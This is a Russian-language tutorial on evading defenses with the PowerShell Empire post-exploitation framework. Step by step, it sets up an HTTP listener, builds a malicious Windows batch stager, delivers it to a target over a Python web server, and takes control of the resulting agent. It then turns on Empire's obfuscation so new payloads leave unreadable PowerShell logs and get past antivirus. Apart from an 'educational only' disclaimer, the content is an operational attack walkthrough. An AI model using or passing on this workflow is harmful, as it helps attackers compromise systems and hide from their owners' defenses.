Defense Evasion с помощью Empire
В этой статье пойдет речь об осуществлении Defense Evasion с помощью PowerShell Empire. PowerShell Empire — один из популярных инструментов постэксплуатации, который заслуживает внимания.
ВНИМАНИЕ!!!! АВТОР ДАННОЙ СТАТЬИ НЕ НЕСЕТ ОТВЕТСТВЕННОСТИ ЗА ЛЮБЫЕ ДЕЙСТВИЯ ОТ ЕЕ ПРОЧТЕНИЯ. ВСЕ МАТЕРИАЛЫ ПРЕДОСТАВЛЕНЫ В ИСКЛЮЧИТЕЛЬНО ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЯХ!
Установка
При выполнении Defense Evasion с помощью Empire важно правильно провести установку. Существует два способа для настройки Empire: стоит обратить свое внимание, что скрипты не будут работать, если пользователь установит Empire с помощью команды apt install. Но этой проблемы не возникнет, если он использует команду git clone, как показано на рисунке ниже:
git clone https://github.com/BC-SECURITY/Empire
Приведенная выше команда загрузит Empire в систему пользователя и установит ее. Используется еще одна команда:
cd Empire/ cd setup/ .install.sh

Получение сеанса с помощью Empire
С помощью вышеприведенных команд программа Empire будет загружена и установлена. Теперь необходимо привести ее в рабочее состояние и получить сеанс целевой системы. Как только пользователь начинает свою работу с Empire, первое, что нужно сделать, это запустить листенер. Для этого он будет использовать набор следующих команд:
listeners uselistener http set Port 80 execute
Вышеприведенные команды запустят листенер на порту номер 80. Как только листенер будет активен, человек должен запустить стейджер. Стейджер, который он собирается использовать в этом практическом примере, относится к Windows и написан на пакетном языке. Чтобы запустить стэйджер, пользователь использует следующий набор команд:
back usestager windows/launcher_bat set Listener http execute

Как только вредоносная программа будет готова, она сохранится в каталоге /tmp по умолчанию, это читатели могут увидеть на изображении выше. Чтобы отправить этот файл bat на целевой компьютер, человек может использовать python one-liner server или выбрать любой другой метод, который ему нравится. Пользователь использовал сервер python для этого практического примера. Чтобы использовать сервер python, следует ввести следующую команду в каталог, где хранится файл, в данном случае это был каталог /tmp:
python -m SimpleHTTPServer

Как только файл будет открыт в целевой системе, пользователь получит свой сеанс, как показано на рисунке ниже. Для доступа к сеансу или агенту (в соответствии с терминологией Empire) нужно использовать следующие команды:
agents interact <agent name>

В каталоге просмотра событий пользователь может перейти по пути: Applications and Services Logs > Microsoft > Windows > PowerShell > Operational и проверить журнал, созданный пакетным файлом из Empire, как показано на рисунке ниже:

Обфускация Empire
Читатели могут увидеть на изображении выше, что файлы в журнале говорят о правильной детализации вредоносной программы. Эти сведения включают в себя код файла, в котором хранится сам файл, и другие важные детали. Подобные данные, когда они считываются системой, облегчают обнаружение файла. Чтобы успешно атаковать цель, важно «увернуться» от всех защит, установленных целью. Для того чтобы сделать это, человек проведет обфускацию Empire, а затем создаст свой вредоносный файл. Обфускация Empire будет означать то, что все вредоносные файлы, которые будут сгенерированы в ней, будут безызвестными, т.е. они должны обнаруживаться в целевой системе и обходить защитные инструменты, такие как антивирусники. Чтобы провести обфускацию Empire, сначала стоит ввести следующую команду:
preobfuscate
Приведенная выше команда загрузит все скрипты, необходимые для обфускации.

Команда, выполненная выше, займет немного времени, но она позволит пользователю успешно провести свою атаку. После загрузки всех скриптов пользователю надо ввести следующую команду:
set Obfuscate true
Эта команда инициирует обфускацию: все разработанные стейджеры и созданные агенты будут обфускированы, как читатели могут увидеть на рисунке ниже:

Теперь, после того как обфускация прошла, пользователь снова запустит листенер и стейджер со следующим набором команд:
usestager windows/launcher_bat set Listener http execute

Аналогично, как и раньше, следует использовать сервер python для доставки вредоносного файла на целевую систему.
Как только файл будет выполнен в целевой системе, пользователь получит новый сеанс, как показано на рисунке ниже. Чтобы получить доступ к новому агенту, следует ввести следующие команды:
agents interact <agent name>

Теперь сеанс, который был получен пользователем, проходит через обфускацию, и он подтверждает это с помощью средства просмотра событий. Нужно проследовать по тому же пути, что и ранее: (Applications and Services Logs > Microsoft > Windows > PowerShell > Operational) в средстве просмотра событий, чтобы увидеть журнал, созданный вредоносным файлом. Как пользователь и читатели могут увидеть на рисунке ниже, детали, которые теперь есть в журнале, расплывчаты и сбивают с толку. Это делает файл нечитаемым для системы: он успешно уклоняется от защиты, такой как антивирусник.

Таким образом, обфускация Empire может спасти пользователя от обнаружения в целевой системе. Важно изучить подобные методы, чтобы уметь проскальзывать между средств защиты в целевой системе.